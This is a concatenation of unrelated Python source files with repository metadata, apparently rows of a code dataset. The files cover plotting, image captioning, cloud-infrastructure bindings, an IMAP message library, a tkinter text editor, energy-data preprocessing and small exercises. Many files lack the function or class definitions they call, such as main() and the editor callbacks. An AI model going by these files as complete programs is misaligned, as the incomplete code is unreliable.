r'Pearson corr.=%.4f' % (corr_coef, ),
r'p-val=%.4f' % (pval_corr_coef, )))
# these are matplotlib.patch.Patch properties
props = dict(boxstyle='round', facecolor='white', alpha=0.5)
# place a text box in upper left in axes coords
fig.text(0.5, 0.95, textstr, transform=fig.transAxes, fontsize=14,
verticalalignment='top', bbox=props)
plt.xlabel('$MMD^2$')
plt.ylabel('Generalization gap in {}'.format(metric_name))
plt.savefig("%s/%s_%s_%s_%s_mmd_%s_scatter.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), bbox_inches='tight')
plt.clf()
h_stats_all.to_csv("%s/hstats_all_%s_%s_%s_%s_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
| 59.430407 | 269 | 0.646285 |
3c57f29eb95c40842b9781c30c39516ef8329161 | 1,285 | py | Python | scripts/remove_after_use/create_spam_node_count_csv.py | caseyrollins/osf.io | e42e566f303d09b54f4025517031b08f404592eb | [
"Apache-2.0"
] | 1 | 2019-12-23T04:30:20.000Z | 2019-12-23T04:30:20.000Z | scripts/remove_after_use/create_spam_node_count_csv.py | caseyrollins/osf.io | e42e566f303d09b54f4025517031b08f404592eb | [
"Apache-2.0"
] | null | null | null | scripts/remove_after_use/create_spam_node_count_csv.py | caseyrollins/osf.io | e42e566f303d09b54f4025517031b08f404592eb | [
"Apache-2.0"
] | null | null | null | import sys
import csv
import logging
import datetime
from website.app import setup_django
setup_django()
from osf.models import Node, SpamStatus
from django.db.models import Count
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
if __name__ == '__main__':
main()
| 32.125 | 173 | 0.721401 |
3c583e3a31b0df8d7782674e1b493230037e47ae | 780 | py | Python | setup.py | greschd/aiida-pytest-mock-codes | 0d104fbad481c6dd2e5a0725e65dc2208fb8058b | [
"MIT"
] | 2 | 2020-02-27T16:52:54.000Z | 2021-07-17T09:07:28.000Z | setup.py | greschd/aiida-pytest-mock-codes | 0d104fbad481c6dd2e5a0725e65dc2208fb8058b | [
"MIT"
] | 31 | 2020-02-27T10:51:27.000Z | 2022-03-04T11:24:26.000Z | setup.py | greschd/aiida-pytest-mock-codes | 0d104fbad481c6dd2e5a0725e65dc2208fb8058b | [
"MIT"
] | 5 | 2020-02-27T13:31:42.000Z | 2022-01-31T18:49:06.000Z | #!/usr/bin/env python
"""Set up aiida-testing package."""
import os
import warnings
import setuptools
from setuptools.config import read_configuration
try:
import fastentrypoints # NOQA # pylint: disable=unused-import
except ImportError:
warnings.warn(
"The 'fastentrypoints' module could not be loaded. "
"Installed console script will be slower."
)
SETUP_CONFIG_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'setup.cfg')
SETUP_KWARGS = read_configuration(SETUP_CONFIG_PATH)
EXTRAS_REQUIRE = SETUP_KWARGS['options']['extras_require']
EXTRAS_REQUIRE['dev'] = (
EXTRAS_REQUIRE["docs"] + EXTRAS_REQUIRE["testing"] + EXTRAS_REQUIRE["pre_commit"]
)
if __name__ == "__main__":
setuptools.setup(extras_require=EXTRAS_REQUIRE)
| 30 | 89 | 0.744872 |
3c595afdb533a0fc9550d6782a8298265522f096 | 8,299 | py | Python | inference.py | biswaroop1547/Neural_Fashion_Caption_Creator | 35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e | [
"MIT"
] | 3 | 2021-04-12T02:23:18.000Z | 2022-01-06T12:05:24.000Z | inference.py | biswaroop1547/Neural_Fashion_Caption_Creator | 35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e | [
"MIT"
] | null | null | null | inference.py | biswaroop1547/Neural_Fashion_Caption_Creator | 35ca0b4b9813ed570bdde7f4f0911c9f9a1d998e | [
"MIT"
] | null | null | null | import os
import time
import h5py
import json
from PIL import Image
import torch
from torch import nn
import torchvision
import torchvision.transforms as transforms
import torch.optim
import torch.nn.functional as F
from torch.utils.data.dataset import random_split
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pack_padded_sequence
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.utils import class_weight
from tqdm.notebook import tqdm
import matplotlib.cm as cm
import torch.backends.cudnn as cudnn
import torch.utils.data
import skimage.transform
from scipy.misc import imread, imresize
device = torch.device("cpu")
def caption_image(encoder, decoder, image_path, word_map, beam_size=3):
"""
Reads an image and captions it with beam search.
Input:
:param encoder: encoder model
:param decoder: decoder model
:param image_path: path to image
:param word_map: word map(word to index mapping)
:param beam_size: number of sequences to consider at each decode-step
Output:
:return: caption, weights for visualization
"""
k = beam_size
vocab_size = len(word_map)
## Read image and process
img = imread(image_path)
if len(img.shape) == 2:
img = img[:, :, np.newaxis]
img = np.concatenate([img, img, img], axis=2)
img = imresize(img, (256, 256))
img = img.transpose(2, 0, 1)
img = img / 255.
img = torch.FloatTensor(img).to(device)
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
transform = transforms.Compose([normalize])
image = transform(img) # (3, 256, 256)
# Encode
# (1, 3, 256, 256)
image = image.unsqueeze(0)
#(1, enc_image_size, enc_image_size, encoder_dim)
#(1, 14, 14, 2048)
encoder_out = encoder(image)
enc_image_size = encoder_out.size(1)
encoder_dim = encoder_out.size(3)
# Flatten encoding
# (1, num_pixels, encoder_dim)
# (1, 196, 2048)
encoder_out = encoder_out.view(1, -1, encoder_dim)
num_pixels = encoder_out.size(1)
# We'll treat the problem as having a batch size of k
# (k, num_pixels, encoder_dim)
encoder_out = encoder_out.expand(k, num_pixels, encoder_dim)
# Tensor to store top k previous words at each step; now they're just <start>
k_prev_words = torch.LongTensor([[word_map['<start>']]] * k).to(device) # (k, 1)
# Tensor to store top k sequences; now they're just <start>
# (k, 1)
seqs = k_prev_words
# Tensor to store top k sequences scores; now they're just 0
top_k_scores = torch.zeros(k, 1).to(device) # (k, 1)
# Tensor to store top k sequences alphas; now they're just 1s
# (k, 1, enc_image_size, enc_image_size)
seqs_alpha = torch.ones(k, 1, enc_image_size, enc_image_size).to(device)
# Lists to store completed sequences, their alphas and scores
complete_seqs = list()
complete_seqs_alpha = list()
complete_seqs_scores = list()
# Start decoding
step = 1
h, c = decoder.init_hidden_state(encoder_out)
# s is a number less than or equal to k,
# because sequences are removed from this process once they hit <end>
while True:
# (s, embed_dim)
embeddings = decoder.embedding(k_prev_words).squeeze(1)
# (s, encoder_dim), (s, num_pixels)
awe, alpha = decoder.attention(encoder_out, h)
# (s, enc_image_size, enc_image_size)
alpha = alpha.view(-1, enc_image_size, enc_image_size)
# gating scalar, (s, encoder_dim)
gate = decoder.sigmoid(decoder.f_beta(h))
awe = gate * awe
# (s, decoder_dim)
h, c = decoder.decode_step(torch.cat([embeddings, awe], dim=1), (h, c))
# (s, vocab_size)
scores = decoder.fc(h)
scores = F.log_softmax(scores, dim=1)
# Add
scores = top_k_scores.expand_as(scores) + scores # (s, vocab_size)
# For the first step, all k points will have the same scores (since same k previous words, h, c)
if step == 1:
top_k_scores, top_k_words = scores[0].topk(k, 0, True, True) # (s)
else:
# Unroll and find top scores, and their unrolled indices
top_k_scores, top_k_words = scores.view(-1).topk(k, 0, True, True) # (s)
# print(top_k_words)
# Convert unrolled indices to actual indices of scores
prev_word_inds = top_k_words // vocab_size # (s)
next_word_inds = top_k_words % vocab_size # (s)
# print(seqs[prev_word_inds])
# Add new words to sequences, alphas
seqs = torch.cat([seqs[prev_word_inds], next_word_inds.unsqueeze(1)], dim=1) # (s, step+1)
seqs_alpha = torch.cat([seqs_alpha[prev_word_inds], alpha[prev_word_inds].unsqueeze(1)],
dim=1) # (s, step+1, enc_image_size, enc_image_size)
# Which sequences are incomplete (didn't reach <end>)?
incomplete_inds = [ind for ind, next_word in enumerate(next_word_inds) if
next_word != word_map['<end>']]
## will be empty if none of them have reached <end>
complete_inds = list(set(range(len(next_word_inds))) - set(incomplete_inds))
# Set aside complete sequences
if len(complete_inds) > 0:
complete_seqs.extend(seqs[complete_inds].tolist())
complete_seqs_alpha.extend(seqs_alpha[complete_inds].tolist())
complete_seqs_scores.extend(top_k_scores[complete_inds])
k -= len(complete_inds) # reduce beam length accordingly
# Proceed with incomplete sequences
if k == 0:
break
seqs = seqs[incomplete_inds]
seqs_alpha = seqs_alpha[incomplete_inds]
### updating h's and c's for incomplete sequences
h = h[prev_word_inds[incomplete_inds]]
c = c[prev_word_inds[incomplete_inds]]
encoder_out = encoder_out[prev_word_inds[incomplete_inds]]
top_k_scores = top_k_scores[incomplete_inds].unsqueeze(1)
k_prev_words = next_word_inds[incomplete_inds].unsqueeze(1)
# Break if things have been going on too long
if step > 40:
break
step += 1
# print(complete_seqs)
i = complete_seqs_scores.index(max(complete_seqs_scores))
seq = complete_seqs[i]
alphas = complete_seqs_alpha[i]
return seq, alphas
# def visualize_att(image_path, seq, alphas, rev_word_map, smooth=False):
# """
# Visualizes caption with weights at every word.
# Adapted from paper authors' repo: https://github.com/kelvinxu/arctic-captions/blob/master/alpha_visualization.ipynb
# :param image_path: path to image
# :param seq: generated caption
# :param alphas: attention weights for every time steps
# :param rev_word_map: reverse word mapping, i.e. ix2word
# :param smooth: smooth weights?
# """
# image = Image.open(image_path)
# image = image.resize([14 * 14, 14 * 14], Image.LANCZOS)
# words = [rev_word_map[ind] for ind in seq]
# figures = []
# for t in range(len(words)):
# fig = plt.figure()
# if t > 50:
# break
# #plt.subplot(np.ceil(len(words) / 5.), 5, t + 1)
# fig.text(0, 1, '%s' % (words[t]), color='black', backgroundcolor='white', fontsize=12)
# plt.imshow(image)
# current_alpha = alphas[t, :]
# if smooth:
# alpha = skimage.transform.pyramid_expand(current_alpha.numpy(), upscale=14, sigma=8)
# else:
# alpha = skimage.transform.resize(current_alpha.numpy(), [14 * 14, 14 * 14])
# if t == 0:
# plt.imshow(alpha, alpha=0)
# else:
# plt.imshow(alpha, alpha=0.8)
# plt.set_cmap(cm.Greys_r)
# plt.axis('off')
# figures.append(fig)
# #plt.savefig("horse_riding/"+words[t]+ str(t)+'.png', bbox_inches = 'tight', pad_inches = 0)
# plt.show()
| 32.291829 | 121 | 0.616821 |
3c599676a9ae26a258559d911189a12f55452ddf | 666 | py | Python | src/yellowdog_client/model/internal_user.py | yellowdog/yellowdog-sdk-python-public | da69a7d6e45c92933e34fefcaef8b5d98dcd6036 | [
"Apache-2.0"
] | null | null | null | src/yellowdog_client/model/internal_user.py | yellowdog/yellowdog-sdk-python-public | da69a7d6e45c92933e34fefcaef8b5d98dcd6036 | [
"Apache-2.0"
] | null | null | null | src/yellowdog_client/model/internal_user.py | yellowdog/yellowdog-sdk-python-public | da69a7d6e45c92933e34fefcaef8b5d98dcd6036 | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass, field
from typing import List, Optional
from .access_delegate import AccessDelegate
from .password_state import PasswordState
from .user import User
| 33.3 | 85 | 0.753754 |
3c59b7068b704fe1f1c47ee7e6a0b30a676e031e | 6,891 | py | Python | sdk/python/pulumi_aws/dms/replication_task.py | pulumi-bot/pulumi-aws | 756c60135851e015232043c8206567101b8ebd85 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/dms/replication_task.py | pulumi-bot/pulumi-aws | 756c60135851e015232043c8206567101b8ebd85 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/dms/replication_task.py | pulumi-bot/pulumi-aws | 756c60135851e015232043c8206567101b8ebd85 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import pulumi
import pulumi.runtime
| 49.57554 | 288 | 0.689015 |
3c5b0b5866a106b628ab68aee24923fb36a181b9 | 8,674 | py | Python | pymap/interfaces/message.py | BoniLindsley/pymap | b3190d20799a6d342888e51bfc55cdfcbfe3ed26 | [
"MIT"
] | 18 | 2015-06-04T21:09:37.000Z | 2022-03-04T08:14:31.000Z | pymap/interfaces/message.py | BoniLindsley/pymap | b3190d20799a6d342888e51bfc55cdfcbfe3ed26 | [
"MIT"
] | 114 | 2018-10-17T23:11:00.000Z | 2022-03-19T16:59:16.000Z | pymap/interfaces/message.py | BoniLindsley/pymap | b3190d20799a6d342888e51bfc55cdfcbfe3ed26 | [
"MIT"
] | 8 | 2015-02-03T19:30:52.000Z | 2021-11-20T12:47:03.000Z |
from __future__ import annotations
from abc import abstractmethod
from collections.abc import Collection, Sequence
from datetime import datetime
from typing import TypeVar, Protocol
from ..bytes import Writeable
from ..flags import SessionFlags
from ..parsing.response.fetch import EnvelopeStructure, BodyStructure
from ..parsing.specials import Flag, ObjectId, FetchRequirement
__all__ = ['MessageT', 'MessageT_co', 'FlagsKey', 'CachedMessage',
'MessageInterface', 'LoadedMessageInterface']
#: Type variable with an upper bound of :class:`MessageInterface`.
MessageT = TypeVar('MessageT', bound='MessageInterface')
#: Covariant type variable with an upper bound of :class:`MessageInterface`.
MessageT_co = TypeVar('MessageT_co', bound='MessageInterface', covariant=True)
#: Type alias for the value used as a key in set comparisons detecting flag
#: updates.
FlagsKey = tuple[int, frozenset[Flag]]
| 28.071197 | 79 | 0.613212 |
3c5b1d85968d78e7d6653a282357a7d53ef86e80 | 623 | py | Python | auxiliary-scripts/LRC-to-Label.py | xbnstudios/show-scripts | fb2eb5bb41eadc9757567fb6b1217d6c2bad0620 | [
"Unlicense"
] | 1 | 2018-03-08T16:00:31.000Z | 2018-03-08T16:00:31.000Z | auxiliary-scripts/LRC-to-Label.py | ManualManul/XBN | fb2eb5bb41eadc9757567fb6b1217d6c2bad0620 | [
"Unlicense"
] | null | null | null | auxiliary-scripts/LRC-to-Label.py | ManualManul/XBN | fb2eb5bb41eadc9757567fb6b1217d6c2bad0620 | [
"Unlicense"
] | null | null | null | import glob
for file in glob.glob("*.lrc"):
filename = file[0:7] # assume fnt-xxx.lrc file format
lrc_file = open(file, encoding="utf-8")
lrc_lines = lrc_file.readlines()
lrc_file.close()
label = open(filename + '.txt', 'w', encoding="utf-8")
print(filename)
for line in lrc_lines[3:]:
time = line[line.find("[")+1:line.find("]")].replace('.', ':').split(':')
labeltime = str(int(time[0]) * 60 + int(time[1])) + '.' + time[2] + '0000'
title = line.split(']',1)[1].rstrip('\n')
label.write(labeltime + ' ' + labeltime + ' ' + title + '\n')
label.close()
| 31.15 | 82 | 0.552167 |
3c5b46fd9008363f42f8cbdbddac0fafdcddf679 | 2,750 | py | Python | driving/boost_grab.py | Chadc265/DingusBot | 98a05fe6ef75e2b48038f9fbbfacc204e89d0d86 | [
"MIT"
] | null | null | null | driving/boost_grab.py | Chadc265/DingusBot | 98a05fe6ef75e2b48038f9fbbfacc204e89d0d86 | [
"MIT"
] | null | null | null | driving/boost_grab.py | Chadc265/DingusBot | 98a05fe6ef75e2b48038f9fbbfacc204e89d0d86 | [
"MIT"
] | null | null | null | import math
from rlbot.agents.base_agent import SimpleControllerState
from rlbot.utils.structures.game_data_struct import GameTickPacket
from driving.drive import drive_to_target
from base.action import Action
from base.car import Car
from base.ball import Ball
from util.vec import Vec3
from util.boost import BoostTracker, Boost | 42.96875 | 136 | 0.623636 |
3c5bb249ee0abe83ae7713176bfcb5fd594b89eb | 2,026 | py | Python | texteditor.py | bkenza/text-editor | 595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad | [
"MIT"
] | null | null | null | texteditor.py | bkenza/text-editor | 595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad | [
"MIT"
] | null | null | null | texteditor.py | bkenza/text-editor | 595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad | [
"MIT"
] | null | null | null | import sys
from tkinter import *
from tkinter import filedialog
####################
# FUNCTIONS #
####################
#########################
# TEXT EDITOR
#########################
# Create text editor
text_editor = Tk("Kenza's text editor")
# Add text widget
text = Text(text_editor)
text.grid()
# Add save button
button = Button(text_editor, text="Save", command=saveas)
button.grid(row=1, column=1)
# Dark mode
theme = Button(text_editor, text="Dark", command=darktheme)
theme.grid(row=1, column=2)
# Light mode
theme = Button(text_editor, text="Light", command=lighttheme)
theme.grid(row=1, column=3)
# Add font menu
font = Menubutton(text_editor, text="Font")
font.grid(row=1, column=4)
font.menu = Menu(font, tearoff=0)
font["menu"] = font.menu
Helvetica = IntVar()
Arial = IntVar()
Times = IntVar()
Courier = IntVar()
font.menu.add_checkbutton(label="Courier", variable=Courier,
command=FontCourier)
font.menu.add_checkbutton(label="Helvetica", variable=Helvetica,
command=FontHelvetica)
font.menu.add_checkbutton(label="Arial", variable=Arial,
command=FontArial)
font.menu.add_checkbutton(label="Times", variable=Times,
command=FontTimes)
text_editor.mainloop()
| 20.886598 | 64 | 0.633268 |
3c5cbe5565f6ab8319a2c93389c8a977b851666a | 525 | py | Python | api/models/__init__.py | NathanBMcNamara/Speculator | e74aff778d6657a8c4993c62f264008c9be99e78 | [
"MIT"
] | 106 | 2017-11-09T13:58:45.000Z | 2021-12-20T03:11:19.000Z | api/models/__init__.py | NathanBMcNamara/Speculator | e74aff778d6657a8c4993c62f264008c9be99e78 | [
"MIT"
] | 6 | 2017-10-30T13:29:49.000Z | 2021-09-13T12:06:59.000Z | api/models/__init__.py | NathanBMcNamara/Speculator | e74aff778d6657a8c4993c62f264008c9be99e78 | [
"MIT"
] | 39 | 2017-10-30T16:35:01.000Z | 2021-10-31T10:32:48.000Z | """ Default import all .py files in current directory """
from glob import iglob
from re import search
__all__ = []
""" Find all DB model modules and their paths """
for path in iglob('./**/*.py', recursive=True):
model_pattern = '.*/models/\w+\.py'
if search(model_pattern, path) is not None:
""" Get model modules """
FILE_INDEX = -1 # Files are the last part of a path
module = path.split('/')[FILE_INDEX].rstrip('.py')
if module != '__init__':
__all__.append(module)
| 32.8125 | 59 | 0.617143 |
3c5cc632bb94b5ef7ccfb33dc669053fbfcfe760 | 1,374 | py | Python | Software/localization_sims/mlat.py | ncsurobotics/acoustics-sw8 | f2ab37416f7235c1d3681e5e2e237c26da276ed6 | [
"MIT"
] | null | null | null | Software/localization_sims/mlat.py | ncsurobotics/acoustics-sw8 | f2ab37416f7235c1d3681e5e2e237c26da276ed6 | [
"MIT"
] | null | null | null | Software/localization_sims/mlat.py | ncsurobotics/acoustics-sw8 | f2ab37416f7235c1d3681e5e2e237c26da276ed6 | [
"MIT"
] | null | null | null | from tdoa_sim import TDOASim
import numpy as np
| 37.135135 | 129 | 0.532751 |
3c5dbe6d61fbd8cfdc1de683ac736616ff35e009 | 2,811 | py | Python | code/preprocess/consumption/sector/tn/tn_tx.py | Spacebody/MCM-ICM-2018-Problem-C | 89acbec8b7b08733002e570ff67637e7ba100190 | [
"MIT"
] | 1 | 2021-09-18T08:01:19.000Z | 2021-09-18T08:01:19.000Z | code/preprocess/consumption/sector/tn/tn_tx.py | Spacebody/MCM-ICM-2018-Problem-C | 89acbec8b7b08733002e570ff67637e7ba100190 | [
"MIT"
] | null | null | null | code/preprocess/consumption/sector/tn/tn_tx.py | Spacebody/MCM-ICM-2018-Problem-C | 89acbec8b7b08733002e570ff67637e7ba100190 | [
"MIT"
] | 1 | 2018-05-13T08:39:46.000Z | 2018-05-13T08:39:46.000Z | #! usr/bin/python3
import pandas as pd
import re
import numpy as np
import os
import sys
from collections import OrderedDict, defaultdict
import matplotlib as mpl
import matplotlib.pyplot as plt
# import seaborn as sns
from scipy import stats, integrate
# sns.set() # switch to seaborn default
# sns.set_style("whitegrid")
#load sector msncodes
tn_msncodes = pd.read_csv("data/csv/consumption/sector/tn_sector.csv", engine='c', low_memory=True)["MSN"]
#load state data
tx_data = pd.read_csv("data/csv/state_data/tx_data.csv", engine='c', low_memory=True)
tx_msn = []
tx_year = []
tx_value = []
for i in range(len(tx_data["MSN"])):
for j in range(len(tn_msncodes)):
if tx_data["MSN"][i] == tn_msncodes[j]:
tx_msn.append(tx_data["MSN"][i])
tx_year.append(tx_data["Year"][i])
tx_value.append(tx_data["Data"][i])
else:
pass
tx_tn = OrderedDict()
tx_tn["MSN"] = tx_msn
tx_tn["Year"] = tx_year
tx_tn["Data"] = tx_value
tx_tn_data = pd.DataFrame(tx_tn)
tx_tn_data.to_csv("data/csv/consumption/sector/tx/tx_tn_data.csv",
index=False, index_label=False, sep=',')
# print(tx_tn_data)
sectors = ["TNACB", "TNCCB", "TNICB", "TNRCB"]
tnacb = OrderedDict()
tnacb["Year"] = []
tnacb["Data"] = []
tnccb = OrderedDict()
tnccb["Year"] = []
tnccb["Data"] = []
tnicb = OrderedDict()
tnicb["Year"] = []
tnicb["Data"] = []
tnrcb = OrderedDict()
tnrcb["Year"] = []
tnrcb["Data"] = []
for i in range(len(tx_tn_data["MSN"])):
if tx_tn_data["MSN"][i] == "TNACB":
tnacb["Year"].append(tx_tn_data["Year"][i])
tnacb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNCCB":
tnccb["Year"].append(tx_tn_data["Year"][i])
tnccb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNICB":
tnicb["Year"].append(tx_tn_data["Year"][i])
tnicb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNRCB":
tnrcb["Year"].append(tx_tn_data["Year"][i])
tnrcb["Data"].append(tx_tn_data["Data"][i])
else:
pass
tnacb_data = pd.DataFrame(tnacb)
tnacb_data.to_csv("data/csv/consumption/sector/tx/tn/tnacb.csv",
index=False, index_label=False, sep=',')
tnccb_data = pd.DataFrame(tnccb)
tnccb_data.to_csv("data/csv/consumption/sector/tx/tn/tnccb.csv",
index=False, index_label=False, sep=',')
tnicb_data = pd.DataFrame(tnicb)
tnicb_data.to_csv("data/csv/consumption/sector/tx/tn/tnicb.csv",
index=False, index_label=False, sep=',')
tnrcb_data = pd.DataFrame(tnrcb)
tnrcb_data.to_csv("data/csv/consumption/sector/tx/tn/tnrcb.csv",
index=False, index_label=False, sep=',')
# print(tnacb_data)
# print(tnccb_data)
# print(tnicb_data)
# print(tnrcb_data)
| 30.554348 | 106 | 0.645322 |
3c5e4a066c2e5a426373071cec77c0e0b8244f50 | 10,040 | py | Python | dvrip/message.py | alexshpilkin/xmeye | e76df1d091d85aa6cffb5c332ba6ae419ac9ac89 | [
"CC0-1.0"
] | 34 | 2019-05-04T06:06:17.000Z | 2021-12-06T03:28:40.000Z | dvrip/message.py | alexshpilkin/xmeye | e76df1d091d85aa6cffb5c332ba6ae419ac9ac89 | [
"CC0-1.0"
] | 9 | 2019-06-17T09:37:50.000Z | 2020-10-24T22:36:29.000Z | dvrip/message.py | alexshpilkin/xmeye | e76df1d091d85aa6cffb5c332ba6ae419ac9ac89 | [
"CC0-1.0"
] | 21 | 2019-06-17T09:34:27.000Z | 2022-03-22T18:14:22.000Z | from abc import abstractmethod
from datetime import datetime, timedelta
from enum import Enum, unique
from io import RawIOBase
from json import dumps, load
from string import hexdigits
from typing import ClassVar, Generator, Generic, Iterable, List, Optional, \
Sequence, Type, TypeVar, Union, cast
from .errors import DVRIPDecodeError
from .packet import Packet
from .typing import Value, for_json, json_to
_C = TypeVar('_C', bound='Choice')
_M = TypeVar('_M', bound='Message')
_R = TypeVar('_R', bound='Status')
_S = TypeVar('_S', bound='Session')
_T = TypeVar('_T')
hextype = (_json_to_hex, _hex_for_json)
_DTFORMAT = '%Y-%m-%d %H:%M:%S'
_NOSTRING = '0000-00-00 00:00:00'
_EPSTRING = '2000-00-00 00:00:00'
EPOCH = datetime(2000, 1, 1, 0, 0, 0)
RESOLUTION = timedelta(seconds=1)
datetimetype = (_json_to_datetime, _datetime_for_json)
Filter = Generator[Union['NotImplemented', None, _T], Optional[Packet], None]
| 30.892308 | 112 | 0.684363 |
3c699b1ae35663ad09b05a480af4601cff664c7b | 1,276 | py | Python | opennem/core/stations/station_code_from_duids.py | willhac/opennem | c8fbcd60e06898e1eeb2dad89548c4ece1b9a319 | [
"MIT"
] | null | null | null | opennem/core/stations/station_code_from_duids.py | willhac/opennem | c8fbcd60e06898e1eeb2dad89548c4ece1b9a319 | [
"MIT"
] | 1 | 2020-09-06T04:17:59.000Z | 2020-09-06T04:17:59.000Z | opennem/core/stations/station_code_from_duids.py | tourdownunder/opennem | deec3e2079db9d9d84171010fd0c239170d1e7ce | [
"MIT"
] | null | null | null | from functools import reduce
from typing import List, Optional
from opennem.core.normalizers import is_single_number
def station_code_from_duids(duids: List[str]) -> Optional[str]:
"""
Derives a station code from a list of duids
ex.
BARRON1,BARRON2 => BARRON
OSBAG,OSBAG => OSBAG
"""
if type(duids) is not list:
return None
if not duids:
return None
if len(duids) == 0:
return None
duids_uniq = list(set(duids))
common = findcommonstart(duids_uniq)
if not common:
return None
# strip last character if we have one
if is_single_number(common[-1]):
common = common[:-1]
if common.endswith("_"):
common = common[:-1]
if len(common) > 2:
return common
return None
| 19.044776 | 63 | 0.580721 |
3c6baa9940a450d52040d4e352d35fb76791c5db | 1,733 | py | Python | models/Schedule.py | CargaPesada/webservice | 2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4 | [
"MIT"
] | null | null | null | models/Schedule.py | CargaPesada/webservice | 2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4 | [
"MIT"
] | 1 | 2019-11-06T19:21:49.000Z | 2019-11-06T19:21:49.000Z | models/Schedule.py | CargaPesada/webservice | 2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4 | [
"MIT"
] | null | null | null | from database.interface import FirebaseInterface
| 30.403509 | 83 | 0.590306 |
3c6c95883a2948952fd4f838b95cb8573feed183 | 381 | py | Python | Python/DS/tuple.py | salikansari6/interview-prep | 17e98fbb15f87c9f2ecd293896e613f5fe01d3a3 | [
"MIT"
] | 1 | 2021-08-23T18:18:41.000Z | 2021-08-23T18:18:41.000Z | Python/DS/tuple.py | salikansari6/interview-prep | 17e98fbb15f87c9f2ecd293896e613f5fe01d3a3 | [
"MIT"
] | null | null | null | Python/DS/tuple.py | salikansari6/interview-prep | 17e98fbb15f87c9f2ecd293896e613f5fe01d3a3 | [
"MIT"
] | 1 | 2021-08-24T15:40:15.000Z | 2021-08-24T15:40:15.000Z | # Tuples are immutable
print("============ tuples ============")
print()
tuples = (12345, 54321, 'hello!')
print(tuples)
u = tuples, (1, 2, 3, 4, 5)
print(u)
# The statement t = 12345, 54321, 'hello!' is an example of tuple packing:
# the values 12345, 54321 and 'hello!'
# are packed together in a tuple. The reverse operation is also possible
x, y, z = tuples
print(x, y, z)
| 22.411765 | 74 | 0.627297 |
3c6cfcc4cc77979d142a645197f0b512545357ec | 4,304 | py | Python | modules/labelfusion/imagecapture.py | hz-ants/LabelFusion-docker2- | 8dc116064a1bdcfa2c2dd814580b5f43d46c6f40 | [
"BSD-3-Clause"
] | 313 | 2017-07-16T02:00:16.000Z | 2022-03-31T11:00:10.000Z | modules/labelfusion/imagecapture.py | hz-ants/LabelFusion-docker2- | 8dc116064a1bdcfa2c2dd814580b5f43d46c6f40 | [
"BSD-3-Clause"
] | 94 | 2017-07-16T19:59:06.000Z | 2022-03-30T08:14:22.000Z | modules/labelfusion/imagecapture.py | hz-ants/LabelFusion-docker2- | 8dc116064a1bdcfa2c2dd814580b5f43d46c6f40 | [
"BSD-3-Clause"
] | 87 | 2017-07-14T16:01:54.000Z | 2022-03-23T17:33:47.000Z | """
This class consumes and lcmlog, extracts the images and saves them
to png
"""
import os
# director imports
import director.vtkAll as vtk
from director import filterUtils
from director import lcmUtils
from director import cameraview
import bot_core as lcmbotcore
from . import utils
| 32.360902 | 137 | 0.657528 |
3c6d83deebd752e29ffb47bbb2f60866fbe395f9 | 1,947 | py | Python | pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py | dopiwoo/Grokking-the-Coding-Interview | 78b2bacf9d761b460ac78882bac42df7465feec9 | [
"MIT"
] | null | null | null | pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py | dopiwoo/Grokking-the-Coding-Interview | 78b2bacf9d761b460ac78882bac42df7465feec9 | [
"MIT"
] | null | null | null | pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py | dopiwoo/Grokking-the-Coding-Interview | 78b2bacf9d761b460ac78882bac42df7465feec9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 16:59:33 2021
@author: dopiwoo
Given the head of a LinkedList and a number 'k', reverse every alternating 'k' sized sub-list starting from the head.
If, in the end, you are left with a sub-list with less than 'k' elements, reverse it too.
"""
def reverse_alternative_k_elements(head: Node, k: int) -> Node or None:
"""
Time Complexity: O(N)
Space Complexity: O(1)
Parameters
----------
head : Node
Input head of a LinkedList.
k : int
Input number 'k'.
Returns
-------
Node or None
The LinkedList reversed every alternating 'k' sized sub-list starting from the head.
"""
if not head:
return None
cur, prev = head, None
while cur:
i = 0
tail, con = cur, prev
while cur and i < k:
third = cur.next
cur.next = prev
prev = cur
cur = third
i += 1
if con:
con.next = prev
else:
head = prev
tail.next = cur
i = 0
while cur and i < k:
prev = cur
cur = cur.next
i += 1
return head
if __name__ == '__main__':
a = Node(1)
a.next = Node(2)
a.next.next = Node(3)
a.next.next.next = Node(4)
a.next.next.next.next = Node(5)
a.next.next.next.next.next = Node(6)
a.next.next.next.next.next.next = Node(7)
a.next.next.next.next.next.next.next = Node(8)
print(a)
print(reverse_alternative_k_elements(a, 2))
| 24.037037 | 117 | 0.546482 |
3c6ebf3a0e9fc7f67c121517ca72e84e2133c821 | 833 | py | Python | scripts/datasets/dataset.py | daniele21/Financial_Sentiment_Analysis | 3734733f2d1d291c81a6239de121edcce861b463 | [
"MIT"
